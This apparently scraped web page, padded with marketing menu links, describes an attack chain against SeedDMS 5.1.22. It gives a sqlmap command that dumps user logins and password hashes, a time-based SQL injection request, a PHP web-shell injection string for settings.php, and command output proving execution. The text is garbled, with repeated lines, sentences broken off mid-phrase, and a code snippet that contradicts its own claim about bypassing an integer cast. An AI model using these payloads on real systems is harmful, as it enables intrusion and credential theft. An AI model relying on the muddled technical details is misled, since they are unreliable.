seeddms 5.1.22 exploit
Iniciar sesión

5.1.22 Exploit - Seeddms

Using sqlmap or manual payloads, an attacker can enumerate the database:

sqlmap -u "http://target/seeddms51/op/op.RemoveDocument.php?documentid=1" \
  --technique=T --dbms=mysql --level=3 --risk=2 \
  -D seeddms_db -T tblUsers -C login,passwd --dump

A manual payload (time-based):

GET /seeddms51/op/op.RemoveDocument.php?documentid=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a) HTTP/1.1
Host: target

If the response is delayed by 5 seconds, the vulnerability exists.

Extracted data example: | login | passwd (MD5) | |-----------|--------------------------------------| | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | | user1 | 7c6a180b36896a0a8c02787eeafb0e4c | seeddms 5.1.22 exploit

Once the attacker obtains admin credentials (hash cracked via John or Hashcat), they gain full access to the DMS.

SeedDMS stores uploaded files in:

/data/<folderid>/<documentid>/<version>/<filename>

Without prior documents, the system may assign a new document ID. The exact path can be brute-forced or inferred by attempting to access: Using sqlmap or manual payloads, an attacker can

http://192.168.1.100/seeddms51/data/1000/1/1/evil.php

(Cycle 1000, 1001, etc.)

Alternatively, check for predictable patterns: data/temp/ or data/cache/.

$extraPath = '"; system($_GET["cmd"]); // ';

$extraPath = '"; system($_GET["cmd"]); // ';

GET /seeddms51/conf/settings.php?cmd=id HTTP/1.1

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

The most dangerous vulnerability in SeedDMS 5.1.22 is a Time-Based Blind SQL Injection found in the op/op.RemoveDocument.php and op/op.RemoveFolder.php endpoints. The issue arises because user-supplied input via the documentid or folderid parameter is directly concatenated into SQL queries without sanitization or parameterized queries.

Specifically, the code snippet from op.RemoveDocument.php (simplified):

$documentid = (int) $_GET['documentid']; // Insufficient casting bypass
$query = "SELECT * FROM `tblDocuments` WHERE `id` = " . $_GET['documentid'];

Attackers can bypass the (int) cast using SQL comment characters or encoding tricks, leading to classic Boolean/Time-based injection. A manual payload (time-based): GET /seeddms51/op/op

top
seeddms 5.1.22 exploit
Iniciar sesión
Paid Search Marketing
Search Engine Optimization
Email Marketing
Conversion Rate Optimization
Social Media Marketing
Google Shopping
Influencer Marketing
Amazon Shopping
seeddms 5.1.22 exploit
Explore all solutions